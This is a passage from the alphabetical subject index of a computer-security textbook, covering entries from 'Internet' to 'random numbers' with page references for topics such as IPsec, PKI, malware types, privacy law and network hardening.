Internet Crime Complaint Center (IC3), 698
Internet Engineering Task Force. See IETF (Internet Engineering Task Force)
Internet Explorer (IE). See also browsers, 433
Internet Group Management Protocol (IGMP), 226
Internet Key Exchange (IKE), 175, 329
Internet Message Access Protocol (IMAP), 505
Internet Protocol. See IP (Internet Protocol)
Internet Security Association and Key Management (ISAKMP), 174–175, 327
Internet Small Computer System Interface (iSCSI), 247
Internetwork Operating System (IOS), Cisco, 442
Internetwork Packet Exchange (IPX), 224
interoperability agreements, 58–59
interrelationship diagrams, tools for risk management, 626
intranet
  network architectures, 221
  overview of, 242–243
intruders
  layered security preventing, 29–30
  types of threats, 9
intrusion detection systems. See IDSs (intrusion detection systems)
intrusion prevention systems. See IPSs (intrusion prevention systems)
investigation
  conducting in computer forensics, 682–683
  phase of incident response, 664–665
  rigorousness of methods, 680–681
  steps in forensic investigation, 678
IOCs (Indicators of Compromise), artifacts of intrusion, 668–669
IOS (Cisco Internetwork Operating System), 442
iOS, hardening mobile devices, 456
IP addresses, 236–238
  attacks on, 487–488
  DNS translating names into, 235
  NAT translating private addresses into public, 238–239
  spoofing attacks, 480–481
IP (Internet Protocol)
  datagrams, 226–227
  ICMP, 229–231
  IPv4. See IPv4
  IPv6. See IPv6
  network protocol, 224
  overview of, 226
  TCP vs. UDP, 227–229
ipchains, host-based firewalls in Linux OSs, 435–436
IPcomp (IP Payload Compression Protocol), 183
ipconfig command, in DNS poisoning, 489
IPsec (IP Security)
  configurations, 325–326
  DH protocol used by, 110
  implementing VPNs, 266–267
  ISAKMP implementation of key exchange, 175
  overview of, 324–325
  protocols, 327–329
  SAs (security associations), 325
  transport and tunnel modes, 182–183
IPSs (intrusion prevention systems)
  compared with IDSs, 396
  host-based, 394
  overview of, 394–396
  in UTM system, 272
iptables, host-based firewalls in Linux OSs, 435–436
IPv4
  datagrams, 227
  vs. IPv6, 231–232, 443–444
IPv6
  datagrams, 227
  IGMP replaced by ICMP and MLD, 226
  security concerns, 232
  vs. IPv4, 443–444
IPX (Internetwork Packet Exchange), 224
IR (infrared), 276
ISACA (Information Systems Audit and Control Association), 612
ISAKMP (Internet Security Association and Key Management), 174–175, 327
ISAs (interconnection security agreements), 59
iSCSI (Internet Small Computer System Interface), 247
ISDN (Integrated Services Digital Network), 318
iSKORPiTX, 3
ISO (International Organization for Standardization)
  implementing security policies, 184–185
  OSI model, 224–225
isolation of system, approaches to security, 13
ISSA (Information Systems Security Association), 48
IT contingency planning, 589
IT organizations, separation of duties in, 638
IV (initialization vector)
  attack, 352
  in chosen-plaintext attack, 340
  WEP weakness based on, 353–354
J
jailbreaking, exceeding privileges, 456
Java, 542–543
Java Virtual Machines (JVMs), 543
JavaScript, 544–545
“Jester,” 2
job rotation policies, 48
JVMs (Java Virtual Machines), 543
K
Kali Linux toolset, 496
KEA (Key Exchange Algorithm), 179
key stretching
  Bcrypt, 120
  overview of, 118–119
  PBKDF2 (Password-Based Key Derivation Function 2), 119
KeyCertSign, X.509 digital certificate extensions, 135
KeyEncipherment, X.509 digital certificate extensions, 135
keylogging, attacker techniques, 471
keys
  in asymmetric encryption, 109
  comparing public and private keys, 130
  in contemporary encryption, 96–97
  destroying key pairs, 142
  electronic key exchange, 111
  ephemeral keys, 119
  exhaustive search of keyspace in attacks on encryption, 487
  HSMs safeguarding, 147–148
  ISAKMP implementing key exchange, 174–175
  key archiving, 150
  key escrow, 118–119, 150–151
  key management and exchange protocols, 327, 329
  key pairs in contemporary encryption, 96
  key recovery, 149–150
  mobile application security, 371
  private key protection, 148–149
  quantum key distribution, 114
  session keys in symmetric encryption, 119
  sharing keystore, 133
  storing critical, 148
  in symmetric encryption, 103, 117–118
  TPM (Trusted Platform Module), 98
  weak DES keys, 104
keyspace, comparative strength and performance of algorithms, 93
kill command, stopping running services on UNIX OSs, 418
Kismet, sniffers used in attacks on IEEE 802.11, 352
L
L2TP (Layer 2 Tunneling Protocol), 320–321
language filters, antispam products, 430
LANs (local area networks), 221
laptops, theft of, 201
“last mile” problem, 277
laws. See legal issues
Layer 1 (physical layer), OSI, hubs operating at, 257
Layer 2 (data link layer), OSI
  bridges and switches operating at, 257–258
  Ethernet and Layer 2 addresses, 233
Layer 2 Tunneling Protocol (L2TP), 320–321
layer 3 (network layer), OSI model, routers operating at, 258
layered access, in physical security, 197
layered security, defense in depth, 29–30
LDAP (Lightweight Directory Access Protocol)
  certificate repositories, 143
  injection attacks, 574
  overview of, 539
  SSL/TLS functions for, 539–540
LE (Low Energy), Bluetooth features, 345
LEAP (Lightweight Extensible Authentication Protocol), 357
least common mechanism, Saltzer and Schroeder’s eight principles of security design, 28
least privilege
  applying to software development, 563
  Saltzer and Schroeder’s eight principles of security design, 24–25
Least Significant Bit (LSB), steganography, 114–115
legal issues
  BYOD concerns, 368–369
  CAN-SPAM (Controlling the Assault of Non-Solicited Pornography and Marketing Act), 701–702
  CFAA (Computer Fraud and Abuse Act), 701
  compliance with security-related laws, 56
  computer trespass, 699
  Convention on Cybercrime, 699–700
  cybercrime, 697–698
  digital signature laws, 706–708
  DRM (digital rights management), 708–710
  ECPA (Electronic Communications Privacy Act), 700–701
  GLBA (Gramm-Leach-Bliley Act), 702–703
  import/export restrictions on encryption, 705–706
  international privacy laws. See privacy, international laws
  overview of, 696
  PCI DSS (Payment Card Industry Data Security Standard), 703–704
  primary sources of laws and regulations, 698–699
  privacy laws, 703
  review and Q&A, 713–715
  significant U.S. laws, 700
  SOX (Sarbanes-Oxley Act), 703
  U.S. privacy laws. See privacy, U.S. laws
  USA Patriot Act, 702
lessons learned, incident response and, 666–667
Levin, Vladimir, 2
Lightweight Extensible Authentication Protocol (LEAP), 357
linear cryptanalysis, 91
LinkedIn, 57
Linux OSs
  forensics applied to metadata, 688
  Group Policy, 32–33
  hardening, 419–421
  patches, 426
  software package update utility, 425
LiveCDs, 193, 202
Lloyd, Timothy, 2
load balancing
  fault tolerance from, 600–601
  overview of, 269
local area networks (LANs), 221
local registration authorities (LRAs), 132–133
Local Security Policy utility (secpol), 450
locally shared objects (LSOs), as security or privacy threat, 577
locate service, XKMS, 177
location awareness, Group Policy providing, 451
location services, mobile devices, 370
lockout, mobile device security, 363
locks
  master keys and, 210
  physical access controls, 62, 196–197
  securing hardware, 437
logic bombs, 471
logon
  logging, 391
  restrictions (time of day), 295
logs
  evidence, 682
  logon, 391
Long Term Evolution (LTE), comparing with 3G and 4G, 342
loop protection, switches and, 258
Love Letter virus, 3
Low Energy (LE), Bluetooth features, 345
Low-Water-Mark policy, Biba security model, 36
LRAs (local registration authorities), 132–133
LSB (Least Significant Bit), steganography, 114–115
LSOs (locally shared objects), as security or privacy threat, 577
LTE (Long Term Evolution), comparing with 3G and 4G, 342
M
MAC filtering, 359
MAC flooding attacks, 258
MAC (mandatory access control)
  comparing with Media Access Control, 234
  in Mac OS X, 422
  overview of, 301
MAC (Media Access Control) addresses
  local packet delivery, 233–234
  NICs and, 256–257
  packet delivery and, 233
  remote packet delivery, 234–235
  rogue access points exploiting, 353
Mac OS X, hardening, 421–423
machine hardening, 411
macro viruses, 467–468
MACs (message authentication codes), 340
magic number, for file identification in forensics, 687
magnetic media, 278–279
mail delivery agent (MDA), 506
mail relaying, sending spam via, 515
mail transfer agent (MTA), e-mail agents, 506
mail user agent (MUA), e-mail agents, 506
mainframes, hardening, 456–457
malware (malicious code). See also by individual types
  adware, 471–472
  antimalware products, 426–427
  backdoors and trapdoors, 472–473
  botnets, 471–472
  browsers, 551
  defenses, 473–474
  defined, 7
  detection and prevention, 394
  e-mail, 510–513
  logic bombs, 471
  malicious add-ons, 551
  overview of, 466
  polymorphic malware, 469
  ransomware, 473
  rootkits, 470–471
  spyware, 471
  Trojan horses, 470
  UTM appliances for malware inspections, 273
  viruses, 466–468
  web security gateways protecting against, 271
  worms, 469
man-in-the-middle attacks
  defeating key exchange by intercepting key, 97
  evil twin attacks and, 352
  overview of, 483–484
  public keys and, 129
  session hijacking, 553
  SSL/TLS, 534, 536
Managed Service Accounts, hardening Windows Server 2012, 415
management interfaces, securing, 443
management team, establishing for incident response, 651–652
mandatory access control. See MAC (mandatory access control)
MANs (metropolitan area networks), 221
mantraps, preventing tailgating, 198
master keys, locks and, 210
Maximum Transmission Unit (MTU), packets, 225
MBSA (Microsoft Baseline Security Analyzer), 448–450
MD (Message Digest)
  MD5 ensuring data is not modified, 685
  MD5 supported by WTLS, 340
  MD5 used for SSL/TLS encryption, 533
  overview of, 101–102
MDA (mail delivery agent), 506
MDM (mobile device management), 363, 365
mean time between failures (MTBF), 600, 624
mean time to failure (MTTF), 625
mean time to recovery (mean time to restore), 601
mean time to repair (MTTR), 624
media
  coaxial cable, 274
  disposal and destruction policies, 46–47
  electronic media, 280–281
  fiber-optic cable, 275–276
  magnetic media, 282–283
  optical media, 279–280
  overview of, 273
  physical security concerns, 282–283
  removable, 277–278
  scanning for viruses, 428
  security concerns, 281–282
  unguided media, 276–277
  UTP/STP cable, 274–275
Media Access Control addresses. See MAC (Media Access Control) addresses
Melissa virus, 2–3
memorandum of understanding (MOUs), interoperability agreements, 59
memory sticks, 280
mesh architecture
  of CAs, 158–159
  wireless networks, 223
message authentication codes (MACs), 340
Message Digest. See MD (Message Digest)
message encryption, services provided by S/MIME, 178
message integrity, uses of cryptography, 116
metadata
  in host forensics, 687–688
  in network forensics, 689
metamorphic malware, 466
Metasploit toolset, 496
metrics
  making security measurable, 669–670
  training, 58
metropolitan area networks (MANs), 221
microSD cards, 280
Microsoft Baseline Security Analyzer. See MBSA (Microsoft Baseline Security Analyzer)
Microsoft Management Console (MMC), Security Templates snap-in, 453
Microsoft Outlook, S/MIME options in, 519–520
microwave links, RF waves and, 277
MIDAS (Multics Intrusion Detection and Alerting System), 377
MIME (Multipurpose Internet Mail Extensions) protocol and, 508–509
Mimikatz toolset, 492
MIMO (multiple-input multiple output)
  antenna placement and, 361
  features in IEEE 802.11, 348–349
misuse detection model, IDS models, 380
mitigation
  data minimization and, 658
  defined, 611
  risk management, 614–615, 628–629
Mitnick, Kevin, 2
MITRE
  on coding vulnerabilities, 563
  making security measurable, 669–670
  security management enumerations and standards, 578
  standards associated with IOCs, 669
MLD (Multicast Listener Discovery), in IPv6, 226
MMC (Microsoft Management Console), Security Templates snap-in, 453
mobile application security, 370–372
mobile device management (MDM), 363, 365
mobile devices
  application security, 370–372
  BYOD (Bring Your Own Device) concerns, 366–370
  encrypting, 439
  hardening, 455–456
  infrastructure security and, 255
  location services, 370
  mobile phones, 338–340
  overview of, 362
  securing, 363–366
models, IDSs, 379–381
models, risk management
  applying, 619
  general model, 616–618
  NIST models, 618–619
  SEI model, 618
modems (modulator/demodulator), 265–266
monitoring
  CCTV (closed circuit TV) for, 198–199
  content, 271
  networks, 268–269, 665
  ports, 400
Morris worm
  buffer-overflow attacks, 575
  historical security incidents, 2
MOUs (memorandum of understanding), interoperability agreements, 59
MTA (mail transfer agent), e-mail agents, 506
MTBF (mean time between failures), 624
MTTF (mean time to failure), 625
MTTR (mean time to repair), 624
MTU (Maximum Transmission Unit), packets, 225
MUA (mail user agent), e-mail agents, 506
Multicast Listener Discovery (MLD), in IPv6, 226
Multics Intrusion Detection and Alerting System (MIDAS), 377
multifactor authentication, 310
multiple encryption, 3DES as example of, 104
multiple-factor authentication, 214–215
multiple-input multiple output (MIMO)
  antenna placement and, 361
  features in IEEE 802.11, 348–349
Multipurpose Internet Mail Extensions (MIME) protocol and, 508–509
multitasking, hardening Mac OS X, 422
multipartite nature, of malware, 466
mutual aid agreements, alternative backup sites, 597
mutual authentication, 310
N
NAC (Network Admission Control), 268
NADIR (Network Audit Director and Intrusion Repair), 377
NAP (Network Access Protection)
  controlling access to networks, 267
  hardening Windows OSs, 413–414
NAS (network access server), 312
NAS (Network Attached Storage), 255–256
NAT (Network Address Translation), 238–240, 261
nation-states
  current threat environment, 5–7
  types of threats, 10–11
National Institute of Science and Technology. See NIST (National Institute of Science and Technology)
National White Collar Crime Center (NW3C), 698
NDP (Network Discovery Protocol), 232
near field communication (NFC), 347
need to know principle
  Brewer-Nash model, 35
  in security, 46
Nessus, network vulnerability scanner, 448–449
NetFlow
  collecting network data, 665
  in network forensics, 689
NetRanger, monitoring network links, 378
NetStumbler, attacks on IEEE 802.11, 351–352
network access control, 267–268
Network Access Protection (NAP)
  controlling access to networks, 267
  hardening Windows OSs, 413–414
network access server (NAS), 312
Network Address Translation (NAT), 238–240, 261
Network Admission Control (NAC), 268
network analyzers. See sniffers/sniffing
Network Attached Storage (NAS), 255–256
Network Audit Director and Intrusion Repair (NADIR), 377
network-based IDSs. See NIDSs (network-based IDSs)
network-based intrusion detection, 267
Network Discovery Protocol (NDP), 232
network fabric, flat networks, 243
network hardening
  device configuration, 442–443
  IPv4 vs. IPv6, 443–444
  overview of, 441
  securing management interfaces, 443
  software updates, 442
  VLAN management, 443
network interface cards (NICs)
  overview of, 256–257
  promiscuous mode, 383–384, 398
network layer (layer 3), OSI model, routers operating at, 258
network operating systems (NOSs), 410
network operations center (NOC), 268–269
network segmentation, limiting communication between devices, 457–458
networks/networking
  access control, 267–268
  architectures, 221–222
  CompTIA Security+ Exam Objectives, 738–740
  concentrators, 264
  content and malware inspection, 273
  content filters, 272
  datagrams, 226–227
  DLP (data loss prevention), 272
  DMZ (demilitarized zone), 240–241
  enclaves, 243–244
  extranet, 242–243
  firewalls, 260–264
  flat networks, 243
  forensics, 689
  hubs, bridges, and switches, 257–258
  ICMP (Internet Control Message Protocol), 229–231
  IDSs (intrusion detection systems), 267
  Internet, 241–242
  intranet, 242–243
  IP addresses and subnetting, 236–238
  IP (Internet Protocol), 226
  IPv4 vs. IPv6, 231–232
  load balancers, 269
  modems, 265–266
  monitoring and diagnostics, 268–269, 665
  NAT (Network Address Translation), 238–240
  network taps by protocol analyzers, 399
  NICs (network interface cards), 256–257
  overview of, 220, 256
  packet delivery, 233–236
  packets, 225–226
  PBX (private branch exchange), 266
  protocols, 223–225
  proxies, 270–271
  review and Q&A, 248–251
  routers, 258–259
  security approaches, 24
  security basics, 19
  security zones, 240
  TCP vs. UDP, 227–229
  topologies, 222–223
  tunneling, 246–247
  URL filters, 273
  UTM (unified threat management), 272–273
  VLANs, 244–246
  VPN concentrator, 266–267
  vulnerability scanners, 448
  web security gateways, 271
  wireless devices, 264–265
next-generation firewalls, 263
NFC (near field communication), 347
NICs (network interface cards)
  overview of, 256–257
  promiscuous mode, 383–384, 398
NIDSs (network-based IDSs)
  active and passive NIDSs, 387
  advantages/disadvantages, 386–387
  defined, 378
  overview of, 382–386
  tools, 387–388
NIST (National Institute of Science and Technology)
  definition of incident response, 655
  DES standard, 104
  FIPS standards, 183
  Framework for Improving Critical Infrastructure Cybersecurity, 21–22
  publications related to computer security, 667
  risk management model, 618–619
nmap
  fingerprinting operating system with, 652
  port scanners, 444
NOC (network operations center), 268–269
nonrepudiation
  basic security goals, 20
  uses of cryptography, 117
  X.509 digital certificate extensions, 135
North Korea, Sony hack and, 7
NoSQL database, vs. SQL database, 579
NOSs (network operating systems), 410
notice, in responsible collection of PII, 719
notification, incident response and, 663
NPP (Notice of Privacy Practices), 723
nslookup command, in DNS poisoning, 488–489
NTLM (NT LAN Manager), 320
null sessions (Windows OSs), 478
NW3C (National White Collar Crime Center), 698
O
Oakley, key management and exchange, 327
obfuscation, approaches to security, 13
OCSP (online certificate status protocol), 142
OECD (Organization for Economic Co-operation and Development), 727
OFDM (orthogonal frequency division multiplexing), 348–349
old school attacks, 651–652
Omega Engineering, 2
omnidirectional antennas, 359
on-boarding/off-boarding, BYOD concerns, 368
one-time pads, 96
online certificate status protocol (OCSP), 142
open design, Saltzer and Schroeder’s eight principles of security design, 27–28
open proxy, 270–271
open relays, sending spam via, 515
Open Shortest Path First (OSPF), 442
Open System Interconnection model. See OSI (Open System Interconnection) model
Open Vulnerability and Assessment Language (OVAL), 578
Open Web Application Security Project (OWASP)
  session management cheat sheet, 22
  web-based vulnerabilities and, 553
OpenIOC standard, 669
OpenPGP standard
  alternatives to PGP, 180
  GnuPG and GPG, 123
OpenSSL cryptography, 79
Operation Aurora, 5
Operation Bot Roast, 3–4
Operation Night Dragon, 7
operational model of computer security, 20, 72
operational security. See organizational security
operations, continuity of, 587
opt-in/opt-out approaches to privacy, in U.S. and Europe, 727
optical media, 279–280
Organization for Economic Co-operation and Development (OECD), 727
organizational security
  alerts regarding new threats and security trends, 57–58
  awareness and training, 54–55
  change management policy, 44–45
  compliance with laws, best practices and standards, 56
  CompTIA Security+ Exam Objectives, 741–745
  data policies, 45–47
  due care and due diligence, 53
  due process, 54
  electromagnetic eavesdropping, 66–67
  environmental issues, 63–64
  fire suppression, 64
  human resources policies, 47–53
  incident response policies and procedures, 54
  interoperability agreements, 58–59
  overview of, 42
  physical access controls, 61–63
  policies, procedures, standards, and guidelines, 43–44
  policy training and procedures, 55
  preparing for incident response, 655–656
  review and Q&A, 68–71
  role-based training, 55–56
  security perimeter, 60–61
  training metrics and compliance, 58
  user habits in, 56–57
  wireless networks and, 65–66
orthogonal frequency division multiplexing (OFDM), 348–349
OSI (Open System Interconnection) model
  bridges and switches operating at Layer 2, 257–258
  hubs operating at Layer 1, 257
  network protocols and, 224–225
  routers operating at Layer 3, 258
OSPF (Open Shortest Path First), 442
OSs (operating systems). See also by individual operating system
  hardening, 240
  host hardening, 412
  host security and, 23
  passive tools for mapping, 402–403
  system hardening, 409–410
  trusted, 434–435
out-of-band communication, key exchange as, 118
Outlook, S/MIME options in, 519–520
outsourced CAs, 153–154
OVAL (Open Vulnerability and Assessment Language), 578
OWASP (Open Web Application Security Project)
  session management cheat sheet, 22
  web-based vulnerabilities and, 553
P
P2P (peer-to-peer)
  alerts regarding new threats and security trends, 57
  Bluetooth and wireless communication, 65
  network architectures, 222
  trust model, 158–159
PaaS (Platform as a Service), 284
packet filtering, mechanisms firewalls are based on, 261–262
packet flags, TCP, 229
packet sniffers. See sniffers/sniffing
packets
  fragmentation, 225–226
  local packet delivery, 233–234
  MTU (Maximum Transmission Unit), 225
  overview of, 225
  remote packet delivery, 234–236
Padding Oracle On Downgraded Legacy Encryption (POODLE) attacks, 532
pan, tilt, zoom (PTZ) cameras, 199
panel antennas, 360
PANs (personal area networks), 65
PAP (Password Authentication Protocol), 318, 320
Pareto charts, tools for risk management, 626
parity bits, analysis of data stream for changes, 685
partitions, system forensics and, 686
partners, on-boarding/off-boarding, 49
pass-the-hash attacks, 492
Password Authentication Protocol (PAP), 318, 320
Password-Based Key Derivation Function 2 (PBKDF2), 119
passwords
  access control policies, 33
  device configuration, 442–443
  domain password policy, 293–294
  expiration, 297
  guessing attacks, 294, 490–492
  hardening Windows Server 2008, 414
  password policy, 292–293
  poor security practices, 78–80
  SSO (single sign-on), 294–295
PAT (Port Address Translation), 239
patches
  application hardening, 444–445
  applications (programs), 579
  BYOD concerns, 367
  host hardening, 423–426
  patch management, 445–448
  virtualization and, 254
Payment Card Industry Data Security Standard (PCI DSS), 703–704, 725
PBKDF2 (Password-Based Key Derivation Function 2), 119
PBX (private branch exchange), 266
PCI DSS (Payment Card Industry Data Security Standard), 703–704, 725
PEAP (Protected EAP)
  current security methods, 357
  PEAP-TLS, 312
peer-to-peer. See P2P (peer-to-peer)
penetration tests, analysis of security measures, 44
people, role in security
  clean desk policies, 83
  data handling and, 82
  dumpster diving, 80–81
  hoaxes, 77–78
  installing unauthorized hardware or software, 81–82
  obtaining insider information, 74–75
  overview of, 72
  password selection, 78–80
  phishing attacks, 75–76
  physical access, 82–83
  piggybacking (tailgating), 80
  poor practices and, 78
  reverse social engineering, 77
  review and Q&A, 86–89
  security awareness and, 84
  shoulder surfing, 76–77, 80
  social engineering and, 73–74
  SPAM, 76
  training programs, 85
  vishing attacks, 76
perfect forward secrecy, secrecy principles, 120
perimeter security
  NIDSs in, 383
  organizational security, 60–61
permissions
  complete mediation and, 27
  Mac OS X file permissions, 422
  for machine security, 441
  NTFS, 297–298
  reviewing as risk mitigation strategy, 615
  security templates, 453
  UNIX file permissions, 302
  in Windows security model, 289–290
personal area networks (PANs), 65
personal identification numbers (PINs)
  in asymmetric encryption, 297
  shoulder surfing attacks and, 77, 80
Personal Identity Verification (PIV) cards, 211
Personal Information Protection and Electronic Data Act (PIPEDA), 729
personally identifiable information. See PII (personally identifiable information)
personnel, succession planning, 586–587
PERT (program evaluation and review technique) charts, 626
PET (privacy enhancing technology), 730
PGP (Pretty Good Privacy)
  cryptographic applications, 122
  encrypting e-mail, 520–521
  how it works, 180–182
  overview of, 180
pharming attacks
  overview of, 485–486
  types of phishing attacks, 76
PHI (Protected Health Information), 723
phishing attacks
  alerts regarding new threats and security trends, 57
  social engineering attacks, 75–76
  types of, 485–486
phones. See mobile devices; telecommunications
PHP, server-side scripts, 547
phreaking
  basic security terminology, 19
  hacks on phone system, 266
physical layer (Layer 1), OSI, hubs operating at, 257
physical (real or associative) evidence, 676
physical security
  access by non-employees, 82–83
  access controls, 61–63, 196
  access tokens, 211–214
  alarms, 199–200
  attacks related to physical access, 191–194
  autoplay and, 201–202
  BIOS and UEFI, 200–201
  cameras, 198–199
  convergence and, 200
  dealing with unauthorized access, 282–283
  device theft, 203–204
  doors, 198
  electronic access control systems, 197–198
  environmental controls, 204
  fire detection, 207–208
  fire suppression, 205–207
  guards in, 196
  isolation of system, 13
  layered access, 197
  locks, 196–197
  multiple-factor authentication, 214–215
  overview of, 190–191
  policies and procedures, 200
  power protection, 208–210
  review and Q&A, 216–219
  sniffing attacks and, 479
  USB devices and, 201
  walls, fences, gates, and doors in, 195
PIA (privacy impact assessment), 731
PID (process ID), hardening UNIX OSs, 418
piggybacking (tailgating), poor security practices, 80
PII (personally identifiable information)
  collecting, 717
  notice, choice, and consent, 719
  overview of, 717–718
  searching for your own, 718
ping of death, 386
ping of death (POD), 475
ping sweep, 231
PINs (personal identification numbers)
  in asymmetric encryption, 297
  shoulder surfing attacks and, 77, 80
PIPEDA (Personal Information Protection and Electronic Data Act), 729
PIV (Personal Identity Verification) cards, 211
PKCs (Public Key Certificates), 168–169
PKCS (Public Key Cryptography Standards)
  overview of, 170–171
  PKCS #1 attack, 341
  as subset of RSA Security, 168
PKI (public key infrastructure)
  centralized and decentralized infrastructures, 146–147
  certificate attributes, 135–137
  certificate authorities, 130–131
  certificate-based threats, 160–161
  certificate extensions, 135–136
  certificate key destruction, 142
  certificate lifecycle, 137
  certificate registration and generation, 137–138
  certificate renewal, 138–139
  certificate repositories, 143
  certificate revocation, 139–142
  certificate suspension, 139
  combining types of PKIs, 154–155
  CSR (certificate signing request), 138
  digital certificates, 134–135
  hierarchical trust model, 155–157
  HSMs (hardware security modules), 147–148
  hybrid trust model, 159–160
  in-house CAs, 152–153
  key escrow, 150–151
  key recovery, 149–150
  LRAs (local registration authorities), 132–133
  OCSP (online certificate status protocol), 142
  outsourced CAs, 153–154
  overview of, 128–130
  peer-to-peer trust model, 158–159
  private key protection, 148–149
  public CAs, 151–152
  RAs (registration authorities) and, 131–132
  review and Q&A, 162–165
  trust and certificate verification, 143–146
  trust models and, 155–157
PKI (public key infrastructure), protocols
  CC (Common Criteria for Information Technology Security), 184
  cipher suites, 174
  CMP (Certificate Management Protocol), 176
  FIPS (Federal Information Processing Standards Publications), 183
  HTTPS (HTTP Secure), 182
  IPsec (IP Security), 182–183
  ISAKMP (Internet Security Association and Key Management), 174–175
  ISO/IEC 27002, 184–185
  overview of, 166–168
  PGP (Pretty Good Privacy), 180–182
  PKCS (Public Key Cryptography Standards), 170–171
  PKIX (PKI X.509), 169–170
  review and Q&A, 186–189
  S/MIME (Secure/Multipurpose Internet Mail Extensions), 178–180
  SSL/TLS (Secure Sockets Layer/Transport Layer Security), 173–174
  WTLS (Wireless Transport Layer Security), 184
  X.509, 172
  XKMS (XML Key Management Specification), 176–178
PKIX (PKI X.509)
  CMP (Certificate Management Protocol), 176
  digital certificates, 134
  major areas addressed by, 169–170
  model illustrated, 168
plaintext
  attacks on encryption, 486
  encrypting into ciphertext, 90
  historical perspectives on cryptography, 94
plans
  business continuity, 585
  contingency planning, 589
  disaster recovery, 587–588
Platform as a Service (PaaS), 284
PMI (privilege management infrastructure), 170
POD (ping of death), 475
Point-to-Point Protocol (PPP), 317–318
Point-to-Point Tunneling Protocol (PPTP), 318–319
policies
  access control policy, 32–33
  BYOD concerns, 368–369
  change management policy, 44–45
  clean desk policies, 83
  data policy, 45–47
  defined, 43
  developing, 43–44
  domain password policy, 293–294
  enforcing, 410
  firewall policy, 260–261
  groups. See Group Policy
  human resources policy, 47–53
  incident response policy, 54, 655
  ISO/IEC 27002 in implementation of, 184–185
  password policy, 292–293
  physical security, 200
  privacy policy, 52–53, 730
  software restrictive, 434
  training and, 55
policy certificates, 137
policy lifecycle, 43
polymorphic malware, 466, 469
POODLE (Padding Oracle On Downgraded Legacy Encryption) attacks, 532
poor security practices
  clean desk policies, 83
  data handling and, 82
  dumpster diving, 80–81
  installing unauthorized hardware or software, 81–82
  overview of, 78
  password selection, 78–80
  physical access, 82–83
  piggybacking (tailgating), 80
  shoulder surfing, 80
pop-up blockers, 432–433
POP3 (Post Office Protocol version 3), 505
Port Address Translation (PAT), 239
port mirroring, by protocol analyzers, 399–400
port monitoring, 400
port scanners
  nmap, 402
  overview of, 400–402
  viewing open services, 444
port scans, using NIDS, 386
ports, for remote access and authentication protocols, 330
Post Office Protocol version 3 (POP3), 505
power
  Group Policy providing power management, 451
  protection, 208–210
  recovering from power interruptions, 597–598
  Wi-Fi power levels, 361
PPP (Point-to-Point Protocol), 317–318
PPTP (Point-to-Point Tunneling Protocol), 318–319
Pretty Good Privacy. See PGP (Pretty Good Privacy)
prevention
  of data loss. See DLP (data loss prevention)
  of ICMP attacks, 476
  of intruders with layered security, 29–30
  of intrusions. See IPSs (intrusion prevention systems)
  in operational model of computer security, 20
  steps administrators can take, 13
  of SYN flood attacks, 477
  of tailgating, 198
prime numbers
  use in DH protocol, 110
  use in RSA protocol, 111
printing, location-based, 452
privacy
  BYOD concerns, 368
  compliance steps, 730
  cybercrime and, 701
  data breaches, 733
  encryption and, 729
  notice, choice, and consent, 719
  overview of, 716–717
  PET (privacy enhancing technology), 730
  PIA (privacy impact assessment), 731
  PII (personally identifiable information), 717–718
  policies, 52–53, 730
  review and Q&A, 734–736
  sensitive PII, 718
  user actions and, 732–733
  web issues, 731–732
Privacy Act of 1974, 719–720
privacy enhancing technology (PET), 730
privacy impact assessment (PIA), 731
privacy, international laws
  Asian laws, 729–730
  Canadian laws, 729
  European laws, 728–729
  OECD (Organization for Economic Co-operation and Development), 727
  overview of, 727
privacy, U.S. laws
  California Senate Bill 1386 (SB 1386), 724
  CFAA (Computer Fraud and Abuse Act), 721–722
  COPPA (Children’s Online Privacy Protection Act), 722
  FACTA (Fair and Accurate Credit Transactions Act), 725
  FCRA (Fair Credit Reporting Act), 725
  FERPA (Family Education Records and Privacy Act), 721
  FOIA (Freedom of Information Act), 720–721
  GLBA (Gramm-Leach-Bliley Act), 724
  HIPAA (Health Insurance Portability and Accountability Act), 723–724
  overview of, 719–720
  PCI DSS (Payment Card Industry Data Security Standard), 725
  Privacy Act of 1974, 720
  U.S. banking rules and regulations, 724–725
  VPPA (Video Privacy Protection Act), 722–723
private address space, RFC 1918, 237
private branch exchange (PBX), 266
private clouds, 283
private keys
  how PGP works, 180
  protecting, 148–149
  public keys compared with, 130
privilege management infrastructure (PMI), 170
privileges
  defined, 288
  escalation, 652
  jailbreaking, 456
  least privilege, 24–25
  managing, 288–289
  separation of privilege, 25–26
  using low-privilege machine to access sensitive information, 191
  Windows OSs, 298–300
procedures, 55
  defined, 43
  developing, 43–44
  incident response, 54
  physical security, 200
process ID (PID), hardening UNIX OSs, 418
process models, for software development, 559–560
production systems, patching, 446
productivity, web security gateways monitoring, 271
program evaluation and review technique (PERT) charts, 626
programs. See applications
promiscuous mode, NICs and, 383–384, 398
promotions, human resources policies, 48
proof of possession, public keys, 138
Protected EAP (PEAP)
  current security methods, 357
  PEAP-TLS, 312
Protected Health Information (PHI), 723
protection, in operational model of computer security, 20
protection rings, OS security and, 410
protocol analyzers. See also sniffers/sniffing, 398–399
protocols, network, 223–225
proxies
  application layer, 262–263
  proxy attacks, 270–271
  proxy servers, 270
  SSL/TLS, 535
prudent person principle, 53
ps command, viewing running services on UNIX OSs, 418
PSTN (public switched telephone network), 60
psychological acceptability, Saltzer and Schroeder’s eight principles of security design, 29
PTZ (pan, tilt, zoom) cameras, 199
public CAs
  choosing between public and in-house CAs, 152–153
  outsourced CAs compared with, 153
  overview of, 151–152
public clouds, 284
Public Key Certificates (PKCs), 168, 169
public key cryptography. See asymmetric encryption
Public Key Cryptography Standards. See PKCS (Public Key Cryptography Standards)
public key infrastructure. See PKI (public key infrastructure)
public keys
  certificate repositories, 143
  CSR (certificate signing request), 138
  how PGP works, 180
  man-in-the-middle attacks, 129
  private keys compared with, 130
  proof of possession, 138
public switched telephone network (PSTN), 60
public Wi-Fi, securing, 362
Q
QA (quality assurance), change management and, 635
Qakbot worm, isolating, 662
QCs (Qualified Certificates), 170
qualitative risk assessment
  adding objectivity to, 621–622
  comparing with quantitative assessment, 625
  defined, 611
  overview of, 620–621
quality assurance (QA), change management and, 635
quantitative risk assessment
  defined, 611
  overview of, 621
quantum cryptanalysis, 114
quantum cryptography, 113–114
quantum mechanics, 113–114
quarantine, isolating incidents, 661
R
RACE Integrity Primitives Evaluation Message Digest (RIPEMD), 101
radio frequency. See RF (radio frequency)
RADIUS (Remote Authentication Dial-In User Service)
  accounting, 314
  authentication, 312–314
  authorization, 314
  overview of, 312
  remote access vulnerabilities, 329–330
RAID (Redundant Array of Independent Disks), 601–602
rainbow tables, 102
random numbers
  cryptography and, 566
